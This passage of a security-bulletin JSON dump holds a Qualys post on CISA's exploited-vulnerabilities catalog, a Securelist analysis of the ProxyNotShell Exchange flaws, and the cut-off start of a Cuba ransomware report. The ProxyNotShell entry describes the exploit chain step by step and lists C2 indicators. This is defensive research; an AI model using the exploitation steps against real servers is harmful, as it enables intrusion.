"CVE-2021-36955", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42258"], "modified": "2021-11-09T06:15:01", "id": "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team is continuously updating CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d and this is going to be a continuous approach, as CISA frequently amends with the latest CVE as part of their regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified Vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-Actual-1.jpg)\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-2.jpg)\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-3.jpg)\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-4-scaled.jpg)\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/patch-mgmt-windows2.jpg)\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-6.jpg)\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", "CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2022-12-19T16:54:06", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19160500/abstract_black_matrix-990x400.jpg)\n\n## Summary\n\nAt the end of September, GTSC reported an attack on critical infrastructure that took place in August. During the investigation, experts found that two 0-day vulnerabilities in Microsoft Exchange Server were used in the attack. The first one, later identified as CVE-2022-41040, is a server-side request forgery (SSRF) vulnerability that allows an authenticated attacker to remotely trigger the next vulnerability \u2013 CVE-2022-41082. The second vulnerability, in turn, allows remote code execution (RCE) when MS Exchange PowerShell is accessible to the attacker. As noted in the GTSC report, both vulnerabilities were exploited together in the wild to create a backdoor on a vulnerable server, and perform lateral movement.\n\nAfter CVE-2022-41040 and CVE-2022-41082 were revealed, Microsoft provided [mitigation guidance](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) followed by a few updates. According to the company, the vulnerabilities affect MS Exchange Server 2013, MS Exchange Server 2016 and MS Exchange Server 2019.\n\nOn October 11, 2022, Microsoft released patches to cover these vulnerabilities as part of its Patch Tuesday update. After that, on November 17, a security researcher published the first working PoC. It was a Python script that accepts the following parameters: user, password, mail address and command line to be executed on the victim's host.\n\nThe cybersecurity community dubbed the pair of vulnerabilities **ProxyNotShell**. The name refers to a recent ProxyShell attack chain containing similar vulnerabilities in Exchange Servers that were disclosed in 2021. ProxyShell is a set of three vulnerabilities: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207. Attackers used them to create web shells and execute arbitrary code on vulnerable Microsoft Exchange Servers.\n\n## ProxyNotShell exploitation details\n\nThe first step in this attack is exploiting **CVE-2022-41040** to get access to the PowerShell API endpoint. Using an insufficient filtering of input data in the Exchange **Autodiscover** mechanism, an attacker with a known login and password combination for a registered account, can gain access to the privileged endpoint of the Exchange Server API (**https://%_exchange server domain%_/powershell)**. This access allows the attacker to execute PowerShell commands in Exchange's environment on the server machine, passing them in the payload via the XML SOAP protocol.\n\nAt the next step, the attacker must get access to **Web-Based Enterprise Management (WBEM)** via the **WSMAN Protocol**. The attacker initiates the shell on the vulnerable system for further PowerShell script execution via **Windows Remote Management (PsRemoting)**.\n\n[![HTTP POST request with XML SOAP to initiate PsRemoting](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083206/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_01-1024x467.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083206/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_01.png>)\n\n**_HTTP POST request with XML SOAP to initiate PsRemoting_**\n\nAfter initiation of the shell, the attacker should immediately extend its lifetime; otherwise, the shell will be closed as its expiration time is too short by default. This is necessary for further command execution on Exchange Server. To do that the attacker immediately sends a special request via **WSMAN** that enables the **keep alive** option.\n\n[![HTTP POST request with XML SOAP to extend the shell's lifetime](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083245/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_02-1024x541.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083245/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_02.png>)\n\n**_HTTP POST request with XML SOAP to extend the shell's lifetime_**\n\nAfter that, the attacker exploits a second vulnerability \u2013 **CVE-2022-41082**. By using PowerShell Remoting the attacker sends a request to create an address book, passing encoded and serialized data with a special payload as a parameter. In a published PoC, this encoded data contains a gadget called **System.UnitySerializationHolder** that spawns an object of the **System.Windows.Markup.XamlReader** class. This class processes XAML data from a payload, which creates a new object of the **System.Diagnostics** class and contains a method call to open a new process on the target system. In the published PoC, this process is **calc.exe**.\n\n[![HTTP POST request with XML SOAP to start new process](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083322/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_03-1024x417.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083322/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_03.png>)\n\n**_HTTP POST request with XML SOAP to start new process_**\n\n[![Main payload portion that executes the calc.exe process](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083400/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_04.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083400/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_04.png>)\n\n**_Main payload portion that executes the calc.exe process_**\n\n## ProxyNotShell post exploitation\n\nA few weeks later after the vulnerability was disclosed, Kaspersky detected a successful exploitation of **ProxyNotShell** in the wild. The actor performed the following actions:\n\n * Reconnaissance (users, groups, domains)\n * Various hijack attempts (even dropping vulnerable binaries)\n * Remote process injection\n * Persistence\n * Reverse shell\n\nIn this case, the attacker had the credentials to perform such an intrusion. They exploited the company's Exchange Server and as a result were able to create any process they wanted on the Exchange machine, passing commands as a payload.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19095522/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_05-1024x764.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19095522/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_05.png>)\n\nOn the server side all processes that are started via exploitation have a main parent process with certain parameters: **w3wp.exe -ap "msexchangepowershellapppool".**\n\nThese post-exploitation steps of the attack are very similar to the steps in the attack reported by [TrendMicro](<https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Fwww.trendmicro.com%2Fpl_pl%2Fresearch%2F22%2Fg%2Flog4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware.html&data=05%7C01%7Cmapp%40microsoft.com%7C6ea0cb7fcd7d4d2ea92808dab12e25ff%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C638017110445189023%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C1000%7C%7C%7C&sdata=O5D%2B8%2BG%2F%2BthCuhizLONIBuphB6uNAL%2Fp%2BrWWkWfQGa0%3D&reserved=0>), with the only difference being the vulnerabilities that are exploited.\n\nOur products protect against all of these post exploitation steps as well as other attacks leveraging the **CVE-2022-41040** and **CVE-2022-41082** vulnerabilities. The detection name for **ProxyNotShell** is **PDM:Exploit.Win32.Generic**.\n\n## Our recommendations\n\nA few words of advice to those worried about possible exploitation of ProxyNotShell or other 0-day vulnerabilities:\n\n * Focus your defense strategy on detecting lateral movement and data exfiltration to the internet. Pay special attention to outgoing traffic to detect cybercriminal connections.\n * Use the latest [Threat Intelligence](<https://www.kaspersky.com/enterprise-security/threat-intelligence>) data to stay aware of actual TTPs used by threat actors.\n * Use a security solution with exploit prevention, vulnerability and patch management components, such as Kaspersky Endpoint Security for Business. Our [Exploit Prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) component monitors suspicious actions by applications and blocks the execution of malicious files.\n * Use solutions like [Kaspersky Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>) and [Kaspersky Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) that identify and stop attacks in the early stages.\n\n## Indicators of compromise\n\nF77E55FD56FDAD21766CAA9C896734E9 | LockDown.dll | Malware hijack library | Trojan.Win64.Dllhijacker \n---|---|---|--- \nF9322EAD69300501356B13D751165DAA | mfeann.exe | Dropped vulnerable binary for DLL hijack | PDM:Exploit.Win32.Generic \nA2FAE32F116870E5A94B5FAB50A1CB71 | Svchosts.exe | Malware reverse proxy | Trojan.Win64.Agent.qwibok \nHEUR:HackTool.Win64.Proxy.gen \n47A0814408210E6FCA502B3799B3952B | Glib-2.0.dll | Malware hijack library | Trojan.Win64.Dllhijacker \n379F87DAA6A23400ADF19C1CDD6B0DC9 | vmwarexferlogs.exe | Dropped vulnerable binary for DLL hijack | PDM:Exploit.Win32.Generic \n193.149.185.52:443 | \u04212 server \nsync.service.auzreservices.com | \u04212 server", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-19T16:15:49", "type": "securelist", "title": "CVE-2022-41040 and CVE-2022-41082 \u2013 zero-days in MS Exchange", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-12-19T16:15:49", "id": "SECURELIST:0D5B4F09314C45AF952E2FD68F88B8D0", "href": "https://securelist.com/cve-2022-41040-and-cve-2022-41082-zero-days-in-ms-exchange/108364/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-14T11:09:39", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08172822/sl-tropical-beach-cuba-binary-1200-990x400.jpg)\n\n## Introduction\n\nKnowledge is our best weapon in the fight against cybercrime. An understanding of how various gangs operate and what tools they use helps build competent defenses and investigate incidents. This report takes a close look at the history of the Cuba group, and their attack tactics, techniques and procedures. We hope this article will help you to stay one step ahead of threats like this one.\n\n## Cuba ransomware gang\n\n[![Cuba data leak site](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08140902/Cuba_ransomware_01-1024x628.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08140902/Cuba_ransomware_01.png>)\n\nCuba data leak site\n\nThe group's offensives first got on our radar in late 2020. Back then, the cybercriminals had not yet adopted the moniker "Cuba"; they were known as "Tropical Scorpius".\n\nCuba mostly targets organizations in the United States, Canada and Europe. The gang has scored a series of resonant attacks on oil companies, [financial services](<https://www.bleepingcomputer.com/news/security/us-cities-disclose-data-breaches-after-vendors-ransomware-attack/>), [government agencies](<https://techcrunch.com/2022/08/31/montenegro-ransomware-attack-embassy-warning/>) and healthcare providers.\n\nAs with most cyberextortionists lately, the Cuba gang encrypts victims' files and demands a ransom in exchange for a decryption key. The gang infamously uses complex tactics and techniques to penetrate victim networks, such as exploitation of software vulnerabilities and social engineering. They have been known to use compromised remote desktop (RDP) connections for initial access.\n\nThe Cuba gang's exact origins and the identities of its members are unknown, although some researchers believe it might be a successor to another ill-famed extortion gang, Babuk. The Cuba group, like many others of its kind, is a ransomware-as-a-service (RaaS) outfit, letting its partners use the ransomware and associated infrastructure in exchange for a share of any ransom they collect.\n\nThe group has changed names several times since its inception. We are currently aware of the following aliases it has used:\n\n * ColdDraw\n * Tropical Scorpius\n * Fidel\n * Cuba\n\nThis past February, we came across another name for the gang \u2014 "V Is Vendetta", which deviated from the hackers' favorite Cuban theme. This might have been a moniker used by a sub-group or affiliate.\n\nThere is an obvious connection with the Cuba gang: the newly discovered 